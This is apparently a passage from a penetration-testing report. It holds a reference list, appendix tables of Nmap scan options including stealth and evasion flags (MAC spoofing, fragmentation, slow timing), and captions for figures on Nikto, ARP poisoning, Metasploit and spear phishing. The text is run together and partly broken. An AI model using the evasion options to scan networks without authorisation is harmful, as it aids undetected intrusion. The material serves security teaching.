Hacker's Cookbook. Birmingham, UK: Packt Publishing.Sivarajan, S., Chaturvedi, S., Shetty, A., Parikh, K., & Youe, R. (2015). Getting Started with Windows Server Security. Birmingham, UK: Packt Publishing.Sood, A., & Enbody, R. (2014). Targeted Cyber Attacks. Waltham, Massachusetts, United States: Syngress.Stamparm. (2014). SQLMap Features. Retrieved from Github: , J. (2019). Retrieved from Hashcat: Advanced Password Recovery: , C. (2019). Nikto. Retrieved from Github: , D., Singh, A., & Agarwal, M. (2018). Metasploit Penetration Testing CookBook (Third Edition ed.). Birmingham, UK: Packt Publishing.Velu, V. K. (2017). Mastering Kali Linux for Advanced Penetration Testing. Birmingham, UK: Packt Publishing.Yerrid, K. (2013). Instant Netcat Starter. Birmingham, UK: Packt Publishing.Appendix ATable 1 - Example of Basic Nmap Command OptionsoptionExample in a commandDescription-Anmap -A 192.168.1.1Enables OS detection, version detection, script scanning, and traceroute-sVnmap -sV 192.168.1.1Attempts to determine the version of the service running on port-sCnmap -sC 192.168.1.1Scan with default NSE scripts. Considered useful for discovery and safe-fnmap -f 192.168.1.1Requested scan (including ping scans) use tiny fragmented IP packets. Harder for packet filters-vnmap -v 192.168.1.1Increase the verbosity level (use -vv or more for greater effect)-hnmap -hNmap help screen which displays many options-pnmap -p 80 192.168.1.1Specifies which port to CITATION Lyo08 \l 1033 (Lyon, 2008)Table 2 - Nmap Stealth Scanning OptionsOption ExampleDescription--spoof-mac-CiscoSpoofs MAC address shown in packets to show that it is a Cisco device.--data-length 24Adds 24 bits randomly to the majority of packets sent-T paranoidThis sets the speed of the scan to it’s slowest setting-- max-hostgroupLimits the number of IPs scanned at once-- max-parallelism or –scan-delayBoth commands limit the number of scanning probes sent out, limiting the number of packets sent out in order to blend-in with normal traffic-PNThis stops Nmap form pinging active systems which can expose the scan-fThis option fragments packets to obscure the intentions of the scanCITATION Beg14 \p 66-72 \l 1033 (Beggs, 2017, pp. 66-72)Appendix BFigure 1. Nikto Options 1Note: This illustrates the options that Nikto offers when performing a scanFigure 2. Nikto Options 2Note: This illustrates the rest of the Nikto options when performing a scanFigure 3. ARP Poisoning Before and AfterNote: This illustrates how network traffic between two devices changes when an ARP poisoning attack has been performedFigure 4. Enum4Linux Help Page OutputNote: This illustrates the output of the help page for enum4linux. This shows the options available when performing enumeration with enum4linux.Figure 5. Syntax for MetasaploitNote: This illustrates the syntax for Metasploit Framework command-line usageFigure 6. Spear Phishing Model: Targeted Cyber AttackNote: This figure illustrates the spear phishing attack model used to launch a targeted attack ................
................

In order to avoid copyright disputes, this page is only a partial summary.

Google Online Preview   Download